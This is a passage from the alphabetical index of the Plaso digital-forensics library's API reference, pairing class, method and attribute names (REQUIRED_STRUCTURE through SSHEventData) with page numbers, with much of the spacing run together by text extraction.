REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPluginattribute), 274

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPluginattribute), 275

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.mac_notes.MacNotesPluginattribute), 276

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPluginattribute), 277

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePluginattribute), 278

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPluginattribute), 279

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqliteattribute), 280

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.skype.SkypePluginattribute), 283

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin


(plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginattribute), 286

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginattribute), 288

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPluginattribute), 290

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePluginattribute), 292

REQUIRED_STRUCTURE(plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePluginattribute), 293

REQUIRED_TABLES (plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPluginattribute), 225

REQUIRED_TABLES (plaso.parsers.esedb_plugins.interface.ESEDBPluginattribute), 226

REQUIRED_TABLES (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPluginattribute), 229

REQUIRED_TABLES (plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPluginattribute), 233

required_tables()(plaso.parsers.esedb_plugins.interface.ESEDBPluginproperty), 227

REQUIRES_SCHEMA_MATCH(plaso.parsers.sqlite_plugins.interface.SQLitePluginattribute), 270

Reset() (plaso.analyzers.hashing_analyzer.HashingAnalyzermethod), 59

Reset() (plaso.analyzers.interface.BaseAnalyzermethod), 59

Reset() (plaso.analyzers.yara_analyzer.YaraAnalyzermethod), 61

Reset() (plaso.formatters.manager.FormattersManagerclass method), 174

Reset() (plaso.parsers.text_parser.EncodedTextReadermethod), 414

ResetFileEntry() (plaso.parsers.mediator.ParserMediatormethod), 372

resolver_context()(plaso.parsers.mediator.ParserMediatorproperty), 374

response_code (plaso.parsers.firefox_cache.FirefoxCacheEventDataattribute), 350

response_headers (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227

restore_point_event_type(plaso.parsers.winrestore.RestorePointEventDataattribute), 432

restore_point_type(plaso.parsers.winrestore.RestorePointEventData

588 Index


attribute), 432RestorePointEventData (class in

plaso.parsers.winrestore), 432RestorePointLogParser (class in

plaso.parsers.winrestore), 433return_value (plaso.parsers.bsm.BSMEventData at-

tribute), 335retweet_count (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData

attribute), 290retweeted (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData

attribute), 289revision (plaso.parsers.winreg_plugins.usbstor.USBStorEventData

attribute), 322revision_number (plaso.parsers.czip_plugins.oxml.OpenXMLEventData

attribute), 224right_operand (plaso.filters.filters.BinaryOperator

attribute), 159room (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData

attribute), 278root (plaso.containers.plist_event.PlistTimeEventData

attribute), 108root_key (plaso.lib.plist.PlistFile attribute), 188ROOT_VERSION_PATH

(plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPluginattribute), 274

row_identifier (plaso.storage.identifiers.SQLTableIdentifierattribute), 479

rpc_port (plaso.multi_processing.base_process.MultiProcessBaseProcessattribute), 191

RPCClient (class in plaso.multi_processing.rpc), 195RPCServer (class in plaso.multi_processing.rpc), 195rule (plaso.parsers.mcafeeav.McafeeAVEventData at-

tribute), 368run() (plaso.analysis.hash_tagging.HashAnalyzer

method), 43run() (plaso.multi_processing.base_process.MultiProcessBaseProcess

method), 192run_count (plaso.parsers.winprefetch.WinPrefetchExecutionEventData

attribute), 431RunKeyEventData (class in

plaso.parsers.winreg_plugins.run), 314RunPlugins() (plaso.preprocessors.manager.PreprocessPluginsManager

class method), 441

SSafariBinaryCookieEventData (class in

plaso.parsers.safari_cookies), 391SafariCookieFormatter (class in

plaso.formatters.safari_cookies), 177SafariHistoryEventData (class in

plaso.parsers.plist_plugins.safari), 246SafariHistoryPageVisitedEventData (class

in plaso.parsers.sqlite_plugins.safari), 280

SafariHistoryPlugin (class inplaso.parsers.plist_plugins.safari), 247

SafariHistoryPluginSqlite (class inplaso.parsers.sqlite_plugins.safari), 280

Sample() (plaso.engine.profilers.MemoryProfilermethod), 143

Sample() (plaso.engine.profilers.StorageProfilermethod), 143

Sample() (plaso.engine.profilers.TaskQueueProfilermethod), 144

Sample() (plaso.engine.profilers.TasksProfilermethod), 144

sample_rate (plaso.engine.configurations.ProfilingConfigurationattribute), 123

SampleFileProfiler (class inplaso.engine.profilers), 143

SampleMemoryUsage()(plaso.parsers.mediator.ParserMediatormethod), 372

SampleStart() (plaso.engine.profilers.CPUTimeMeasurementmethod), 142

SampleStartTiming()(plaso.parsers.mediator.ParserMediatormethod), 372

SampleStop() (plaso.engine.profilers.CPUTimeMeasurementmethod), 142

SampleStopTiming()(plaso.parsers.mediator.ParserMediatormethod), 372

SampleTaskStatus()(plaso.multi_processing.task_manager.TaskManagermethod), 198

SAMUsersWindowsRegistryEventData (class inplaso.parsers.winreg_plugins.sam_users), 314

SAMUsersWindowsRegistryPlugin (class inplaso.parsers.winreg_plugins.sam_users), 315

SantaExecutionEventData (class inplaso.parsers.santa), 392

SantaFileSystemEventData (class inplaso.parsers.santa), 393

SantaMountEventData (class inplaso.parsers.santa), 394

SantaParser (class in plaso.parsers.santa), 395scale_crop (plaso.parsers.czip_plugins.oxml.OpenXMLEventData

attribute), 224scan_type (plaso.parsers.trendmicroav.TrendMicroAVEventData

attribute), 418ScanForProcessedTasks()

(plaso.storage.redis.redis_store.RedisStoreclass method), 457

scanid (plaso.parsers.symantec.SymantecEventDataattribute), 410

ScanSource() (plaso.cli.storage_media_tool.StorageMediaToolmethod), 91

Index 589


SCCMLogEventData (class in plaso.parsers.sccm),396

SCCMParser (class in plaso.parsers.sccm), 396schema (plaso.containers.artifacts.HostnameArtifact

attribute), 98schema (plaso.parsers.sqlite.SQLiteDatabase attribute),

405SCHEMA_QUERY (plaso.parsers.sqlite.SQLiteDatabase

attribute), 405SCHEMAS (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin

attribute), 251SCHEMAS (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin

attribute), 252SCHEMAS (plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin

attribute), 253SCHEMAS (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin

attribute), 254SCHEMAS (plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin

attribute), 254SCHEMAS (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin

attribute), 255SCHEMAS (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin

attribute), 256SCHEMAS (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin

attribute), 256SCHEMAS (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin

attribute), 258SCHEMAS (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin

attribute), 260SCHEMAS (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin

attribute), 261SCHEMAS (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin

attribute), 262SCHEMAS (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin

attribute), 263SCHEMAS (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin

attribute), 264SCHEMAS (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin

attribute), 267SCHEMAS (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin

attribute), 269SCHEMAS (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin

attribute), 270SCHEMAS (plaso.parsers.sqlite_plugins.interface.SQLitePlugin

attribute), 270SCHEMAS (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin

attribute), 271SCHEMAS (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin

attribute), 272SCHEMAS (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin

attribute), 273SCHEMAS (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin

attribute), 274SCHEMAS (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin

attribute), 275SCHEMAS (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin

attribute), 276SCHEMAS (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin

attribute), 277SCHEMAS (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin

attribute), 278SCHEMAS (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin

attribute), 279SCHEMAS (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite

attribute), 280SCHEMAS (plaso.parsers.sqlite_plugins.skype.SkypePlugin

attribute), 283SCHEMAS (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin

attribute), 286SCHEMAS (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin

attribute), 286SCHEMAS (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin

attribute), 288SCHEMAS (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin

attribute), 290SCHEMAS (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePlugin

attribute), 292SCHEMAS (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePlugin

attribute), 293screen_name (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventData

attribute), 289SEARCH_OBJECT (class in

plaso.analysis.browser_search), 39search_query (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventData

attribute), 288search_term() (plaso.analysis.browser_search.SEARCH_OBJECT

property), 39secondary_url (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData

attribute), 339SECONDS_BETWEEN_STATUS_LOG_MESSAGES

(plaso.analysis.hash_tagging.HashTaggingAnalysisPluginattribute), 44

seconds_spent_analyzing(plaso.analysis.hash_tagging.HashAnalyzerattribute), 42

seconds_spent_analyzing(plaso.analysis.nsrlsvr.NsrlsvrAnalyzer at-tribute), 48

section_names (plaso.parsers.pe.PEEventData at-tribute), 382

secure (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataattribute), 252

secure (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataattribute), 257

secure (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataattribute), 261

security_api (plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataattribute), 362

590 Index


SECURITYD_LINE (plaso.parsers.mac_securityd.MacOSSecuritydLogParserattribute), 363

seedtime (plaso.parsers.bencode_plugins.transmission.TransmissionEventDataattribute), 216

seedtime (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataattribute), 217

SELinuxLogEventData (class inplaso.parsers.selinux), 397

SELinuxParser (class in plaso.parsers.selinux), 397sender (plaso.parsers.asl.ASLEventData attribute),

333sender (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData

attribute), 362sender (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData

attribute), 268sender_pid (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData

attribute), 362separator() (plaso.filters.interface.FilterObject

property), 163sequence_number (plaso.parsers.pls_recall.PlsRecallEventData

attribute), 384sequence_number (plaso.parsers.winrestore.RestorePointEventData

attribute), 433serial (plaso.parsers.santa.SantaMountEventData at-

tribute), 394serial (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData

attribute), 321serial (plaso.parsers.winreg_plugins.usbstor.USBStorEventData

attribute), 322serial_number (plaso.containers.windows_events.WindowsVolumeEventData

attribute), 120serialization_format

(plaso.storage.interface.BaseStore attribute),479

serialization_format(plaso.storage.sqlite.sqlite_file.SQLiteStorageFileattribute), 463

SerializationError, 185SerializedAttributeContainerList (class in

plaso.storage.file_interface), 469SerializedEventHeap (class in

plaso.storage.event_heaps), 466SerializedStreamIdentifier (class in

plaso.storage.identifiers), 479SerializersProfiler (class in

plaso.engine.profilers), 143server_name (plaso.parsers.apache_access.ApacheAccessEventData

attribute), 330server_name (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData

attribute), 305server_name (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData

attribute), 310ServerArgumentsHelper (class in

plaso.cli.helpers.server_config), 74

service (plaso.parsers.sqlite_plugins.imessage.IMessageEventDataattribute), 269

service (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryattribute), 279

service_dll (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDataattribute), 316

service_pack (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDataattribute), 324

service_type (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDataattribute), 316

services() (plaso.analysis.windows_services.WindowsServiceCollectionproperty), 53

ServicesPlugin (class inplaso.parsers.winreg_plugins.services), 315

Session (class in plaso.containers.sessions), 110session (plaso.parsers.popcontest.PopularityContestSessionEventData

attribute), 388session_completion

(plaso.storage.fake.writer.FakeStorageWriterattribute), 446

session_configuration(plaso.storage.fake.writer.FakeStorageWriterattribute), 446

session_identifier (plaso.containers.tasks.Taskattribute), 116

session_identifier(plaso.containers.tasks.TaskCompletion at-tribute), 117

session_identifier(plaso.containers.tasks.TaskStart attribute),117

session_start (plaso.storage.fake.writer.FakeStorageWriterattribute), 446

SessionCompletion (class inplaso.containers.sessions), 112

SessionConfiguration (class inplaso.containers.sessions), 112

SessionizeAnalysisArgumentsHelper (classin plaso.cli.helpers.sessionize_analysis), 75

SessionizeAnalysisPlugin (class inplaso.analysis.sessionize), 49

sessions (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDataattribute), 218

SessionStart (class in plaso.containers.sessions),113

set_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataattribute), 228

SetActiveSession()(plaso.engine.knowledge_base.KnowledgeBasemethod), 130

SetAnalyzersProfiler()(plaso.engine.worker.EventExtractionWorkermethod), 146

SetAndLoadTagFile()

Index 591


(plaso.analysis.tagging.TaggingAnalysisPluginmethod), 50

SetAPIKey() (plaso.analysis.virustotal.VirusTotalAnalysisPluginmethod), 52

SetAPIKey() (plaso.analysis.virustotal.VirusTotalAnalyzermethod), 53

SetAttribute() (plaso.filters.expressions.Expressionmethod), 156

SetCACertificatesPath()(plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 211

SetCodepage() (plaso.engine.knowledge_base.KnowledgeBasemethod), 130

SetDefaultValue()(plaso.filters.path_filter.PathFilterScanTreeNodemethod), 165

SetDocumentType()(plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 211

SetEnvironmentVariable()(plaso.engine.knowledge_base.KnowledgeBasemethod), 131

SetEventDataIdentifier()(plaso.containers.events.EventObject method),104

SetEventDataStreamIdentifier()(plaso.containers.events.EventData method),103

SetEventIdentifier()(plaso.containers.events.EventTag method),105

SetEventTag() (plaso.storage.event_tag_index.EventTagIndexmethod), 467

SetExtractionConfiguration()(plaso.engine.worker.EventExtractionWorkermethod), 146

SetFieldDelimiter()(plaso.output.shared_dsv.DSVEventFormattingHelpermethod), 210

SetFieldDelimiter()(plaso.output.shared_dsv.DSVOutputModulemethod), 210

SetFields() (plaso.output.shared_dsv.DSVEventFormattingHelpermethod), 210

SetFields() (plaso.output.shared_dsv.DSVOutputModulemethod), 210

SetFields() (plaso.output.xlsx.XLSXOutputModulemethod), 214

SetFileEntry() (plaso.parsers.mediator.ParserMediatormethod), 373

SetFilename() (plaso.output.xlsx.XLSXOutputModulemethod), 214

SetFlushInterval()(plaso.output.shared_elastic.SharedElasticsearchOutputModule

method), 211SetHasherNames() (plaso.analyzers.hashing_analyzer.HashingAnalyzer

method), 59SetHost() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin

method), 47SetHost() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer

method), 48SetHost() (plaso.analysis.viper.ViperAnalysisPlugin

method), 51SetHost() (plaso.analysis.viper.ViperAnalyzer

method), 52SetHostname() (plaso.engine.knowledge_base.KnowledgeBase

method), 131SetIdentifier() (plaso.containers.interface.AttributeContainer

method), 107SetIdentifier() (plaso.lib.specification.Signature

method), 190SetIndexName() (plaso.output.shared_elastic.SharedElasticsearchOutputModule

method), 211SetLabel() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin

method), 47SetLookupHash() (plaso.analysis.hash_tagging.HashAnalyzer

method), 43SetLookupHash() (plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin

method), 44SetMaximumPause()

(plaso.analysis.sessionize.SessionizeAnalysisPluginmethod), 49

SetMode() (plaso.cli.status_view.StatusView method),91

SetMountPath() (plaso.engine.knowledge_base.KnowledgeBasemethod), 131

SetOperator() (plaso.filters.expressions.Expressionmethod), 156

SetOutputFormat()(plaso.analysis.windows_services.WindowsServicesAnalysisPluginmethod), 54

SetOutputWriter()(plaso.output.interface.LinearOutputModulemethod), 201

SetPassword() (plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 211

SetPort() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPluginmethod), 47

SetPort() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzermethod), 48

SetPort() (plaso.analysis.viper.ViperAnalysisPluginmethod), 51

SetPort() (plaso.analysis.viper.ViperAnalyzermethod), 52

SetPreferredLanguageIdentifier()(plaso.formatters.mediator.FormatterMediatormethod), 175

SetProcessingProfiler()

592 Index


(plaso.engine.worker.EventExtractionWorkermethod), 146

SetProtocol() (plaso.analysis.viper.ViperAnalysisPluginmethod), 51

SetProtocol() (plaso.analysis.viper.ViperAnalyzermethod), 52

SetRawFields() (plaso.output.elastic.ElasticsearchOutputModulemethod), 199

SetRules() (plaso.analyzers.yara_analyzer.YaraAnalyzermethod), 61

SetSerializersProfiler()(plaso.storage.fake.writer.FakeStorageWritermethod), 450

SetSerializersProfiler()(plaso.storage.file_interface.StorageFileReadermethod), 472

SetSerializersProfiler()(plaso.storage.file_interface.StorageFileWritermethod), 476

SetSerializersProfiler()(plaso.storage.interface.BaseStore method),483

SetSerializersProfiler()(plaso.storage.interface.StorageReadermethod), 486

SetSerializersProfiler()(plaso.storage.interface.StorageWritermethod), 489

SetSerializersProfiler()(plaso.storage.redis.reader.RedisStorageReadermethod), 454

SetSerializersProfiler()(plaso.storage.redis.writer.RedisStorageWritermethod), 460

SetServerInformation()(plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 211

SetSessionIdentifier()(plaso.containers.interface.AttributeContainermethod), 107

SetSourceInformation()(plaso.cli.status_view.StatusView method),91

SetStorageFileInformation()(plaso.cli.status_view.StatusView method),91

SetStorageProfiler()(plaso.storage.fake.writer.FakeStorageWritermethod), 450

SetStorageProfiler()(plaso.storage.file_interface.StorageFileReadermethod), 472

SetStorageProfiler()(plaso.storage.file_interface.StorageFileWriter

method), 476SetStorageProfiler()

(plaso.storage.interface.BaseStore method),483

SetStorageProfiler()(plaso.storage.interface.StorageMergeReadermethod), 484

SetStorageProfiler()(plaso.storage.interface.StorageReadermethod), 486

SetStorageProfiler()(plaso.storage.interface.StorageWritermethod), 489

SetStorageProfiler()(plaso.storage.redis.reader.RedisStorageReadermethod), 455

SetStorageProfiler()(plaso.storage.redis.writer.RedisStorageWritermethod), 460

SetStorageWriter()(plaso.parsers.mediator.ParserMediatormethod), 373

SetTextPrepend() (plaso.engine.knowledge_base.KnowledgeBasemethod), 131

SetTimelineName()(plaso.output.timesketch_out.TimesketchOutputModulemethod), 213

SetTimelineOwner()(plaso.output.timesketch_out.TimesketchOutputModulemethod), 213

SetTimestampFormat()(plaso.output.xlsx.XLSXOutputModulemethod), 214

SetTimeZone() (plaso.engine.knowledge_base.KnowledgeBasemethod), 131

SetTimezone() (plaso.output.mediator.OutputMediatormethod), 208

settings (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventDataattribute), 309

SetupapiLogEventData (class inplaso.parsers.setupapi), 398

SetupapiLogParser (class inplaso.parsers.setupapi), 398

SetURLPrefix() (plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 212

SetUsername() (plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 212

SetUseSSL() (plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 212

SetValue() (plaso.engine.knowledge_base.KnowledgeBasemethod), 131

severity (plaso.parsers.syslog.SyslogLineEventDataattribute), 412

severity (plaso.parsers.winevt.WinEvtRecordEventData

Index 593


attribute), 424sha1 (plaso.parsers.amcache.AMCacheFileEventData

attribute), 327sha1_hash (plaso.containers.events.EventDataStream

attribute), 103SHA1Hasher (class in plaso.analyzers.hashers.sha1),

57sha256_hash (plaso.containers.events.EventDataStream

attribute), 104SHA256Hasher (class in

plaso.analyzers.hashers.sha256), 58share_name (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData

attribute), 305share_name (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData

attribute), 310shared (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData

attribute), 267shared_doc (plaso.parsers.czip_plugins.oxml.OpenXMLEventData

attribute), 224SharedElasticsearchFieldFormattingHelper

(class in plaso.output.shared_elastic), 211SharedElasticsearchOutputModule (class in

plaso.output.shared_elastic), 211shell_item_path (plaso.containers.shell_item_events.ShellItemFileEntryEventData

attribute), 114ShellItemFileEntryEventData (class in

plaso.containers.shell_item_events), 114ShellItemFileEntryEventFormatter (class in

plaso.formatters.shell_items), 177ShellItemsParser (class in

plaso.parsers.shared.shell_items), 249short_filename (plaso.parsers.recycler.WinRecycleBinEventData

attribute), 390show_info (plaso.cli.log2timeline_tool.Log2TimelineTool

attribute), 86show_troubleshooting (plaso.cli.tools.CLITool at-

tribute), 94ShowInfo() (plaso.cli.log2timeline_tool.Log2TimelineTool

method), 87ShutdownWindowsRegistryEventData (class in

plaso.parsers.winreg_plugins.shutdown), 316ShutdownWindowsRegistryPlugin (class in

plaso.parsers.winreg_plugins.shutdown), 317SignalAbort() (plaso.analysis.hash_tagging.HashAnalyzer

method), 43SignalAbort() (plaso.analysis.mediator.AnalysisMediator

method), 47SignalAbort() (plaso.engine.worker.EventExtractionWorker

method), 146SignalAbort() (plaso.multi_processing.analysis_process.AnalysisProcess

method), 191SignalAbort() (plaso.multi_processing.base_process.MultiProcessBaseProcess

method), 191SignalAbort() (plaso.multi_processing.worker_process.WorkerProcess

method), 199SignalAbort() (plaso.parsers.mediator.ParserMediator

method), 373Signature (class in plaso.lib.specification), 190SignaturesFileEntryFilter (class in

plaso.filters.file_entry), 158SingleProcessEngine (class in

plaso.engine.single_process), 144size (plaso.parsers.dtfabric_parser.DtFabricBaseParser

attribute), 346size (plaso.parsers.mactime.MactimeEventData at-

tribute), 365size (plaso.parsers.olecf_plugins.default.OLECFItemEventData

attribute), 235size (plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPlugin

attribute), 236size (plaso.parsers.plist_plugins.dtfabric_plugin.DtFabricBasePlistPlugin

attribute), 241size (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData

attribute), 267size (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData

attribute), 267size (plaso.parsers.winfirewall.WinFirewallEventData

attribute), 426size (plaso.parsers.winreg_plugins.dtfabric_plugin.DtFabricBaseWindowsRegistryPlugin

attribute), 300size() (plaso.lib.bufferlib.CircularBuffer property),

184SIZE_LIMIT (plaso.analyzers.interface.BaseAnalyzer

attribute), 59SkipAhead() (plaso.parsers.text_parser.EncodedTextReader

method), 414SkyDriveLogEventData (class in

plaso.parsers.skydrivelog), 399SkyDriveLogParser (class in

plaso.parsers.skydrivelog), 399SkyDriveOldLogEventData (class in

plaso.parsers.skydrivelog), 400SkyDriveOldLogParser (class in

plaso.parsers.skydrivelog), 400SkypeAccountEventData (class in

plaso.parsers.sqlite_plugins.skype), 281SkypeCallEventData (class in

plaso.parsers.sqlite_plugins.skype), 281SkypeChatEventData (class in

plaso.parsers.sqlite_plugins.skype), 281SkypePlugin (class in

plaso.parsers.sqlite_plugins.skype), 282SkypeSMSEventData (class in

plaso.parsers.sqlite_plugins.skype), 283SkypeTransferFileEventData (class in

plaso.parsers.sqlite_plugins.skype), 283sms_read (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData

attribute), 251

594 Index


SMS_READ (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginattribute), 252

sms_type (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 251

SMS_TYPE (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPluginattribute), 252

snd_status (plaso.parsers.symantec.SymantecEventDataattribute), 410

SOCKET_CONNECTION_BIND(plaso.engine.zeromq_queue.ZeroMQQueueattribute), 151

SOCKET_CONNECTION_CONNECT(plaso.engine.zeromq_queue.ZeroMQQueueattribute), 151

SOCKET_CONNECTION_TYPE(plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueueattribute), 147

SOCKET_CONNECTION_TYPE(plaso.engine.zeromq_queue.ZeroMQPullConnectQueueattribute), 148

SOCKET_CONNECTION_TYPE(plaso.engine.zeromq_queue.ZeroMQPushBindQueueattribute), 149

SOCKET_CONNECTION_TYPE(plaso.engine.zeromq_queue.ZeroMQQueueattribute), 151

SOCKET_CONNECTION_TYPE(plaso.engine.zeromq_queue.ZeroMQRequestConnectQueueattribute), 151

SoftwareUpdatePlugin (class inplaso.parsers.plist_plugins.softwareupdate),247

SophosAVLogEventData (class inplaso.parsers.sophos_av), 401

SophosAVLogParser (class inplaso.parsers.sophos_av), 401

source (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataattribute), 284

source() (plaso.analysis.browser_search.SEARCH_OBJECTproperty), 40

source_code (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventDataattribute), 351

source_code (plaso.parsers.skydrivelog.SkyDriveLogEventDataattribute), 399

source_code (plaso.parsers.skydrivelog.SkyDriveOldLogEventDataattribute), 400

source_configurations(plaso.containers.sessions.Session attribute),111

source_configurations(plaso.containers.sessions.SessionConfigurationattribute), 113

source_ip (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

source_ip (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

SOURCE_LONG (plaso.formatters.interface.EventFormatterattribute), 172

source_name (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 424

source_name (plaso.parsers.winevtx.WinEvtxRecordEventDataattribute), 425

source_port (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

source_port (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

SOURCE_SHORT (plaso.formatters.interface.EventFormatterattribute), 172

SourceConfigurationArtifact (class inplaso.containers.artifacts), 99

sources (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDataattribute), 218

SourceScannerError, 185specifications() (plaso.lib.specification.FormatSpecificationStore

property), 189SplitExpression()

(plaso.filters.parser_filter.ParserFilterExpressionHelpermethod), 164

SpotlightPlugin (class inplaso.parsers.plist_plugins.spotlight), 248

SpotlightStoreDatabaseParser (class inplaso.parsers.spotlight_storedb), 402

SpotlightStoreMetadataAttribute (class inplaso.parsers.spotlight_storedb), 402

SpotlightStoreMetadataItem (class inplaso.parsers.spotlight_storedb), 403

SpotlightStoreMetadataItemEventData(class in plaso.parsers.spotlight_storedb), 403

SpotlightVolumePlugin (class inplaso.parsers.plist_plugins.spotlight_volume),248

Sqlite3DatabaseFile (class inplaso.formatters.winevt_rc), 179

Sqlite3DatabaseReader (class inplaso.formatters.winevt_rc), 180

SQLiteCache (class in plaso.parsers.sqlite), 404SQLiteDatabase (class in plaso.parsers.sqlite), 405SQLiteParser (class in plaso.parsers.sqlite), 405SQLitePlugin (class in

plaso.parsers.sqlite_plugins.interface), 270SQLiteStorageFile (class in

plaso.storage.sqlite.sqlite_file), 462SQLiteStorageFileReader (class in

plaso.storage.sqlite.reader), 462SQLiteStorageFileWriter (class in

plaso.storage.sqlite.writer), 465SQLiteStorageMergeReader (class in

plaso.storage.sqlite.merge_reader), 462

Index 595


SQLTableIdentifier (class inplaso.storage.identifiers), 478

src_call (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281

SRUMApplicationResourceUsageEventData(class in plaso.parsers.esedb_plugins.srum),230

SRUMNetworkConnectivityUsageEventData(class in plaso.parsers.esedb_plugins.srum),231

SRUMNetworkDataUsageEventData (class inplaso.parsers.esedb_plugins.srum), 232

ssgp_hash (plaso.parsers.mac_keychain.KeychainApplicationRecordEventDataattribute), 359

ssgp_hash (plaso.parsers.mac_keychain.KeychainInternetRecordEventDataattribute), 361

SSHEventData (class inplaso.parsers.syslog_plugins.ssh), 295

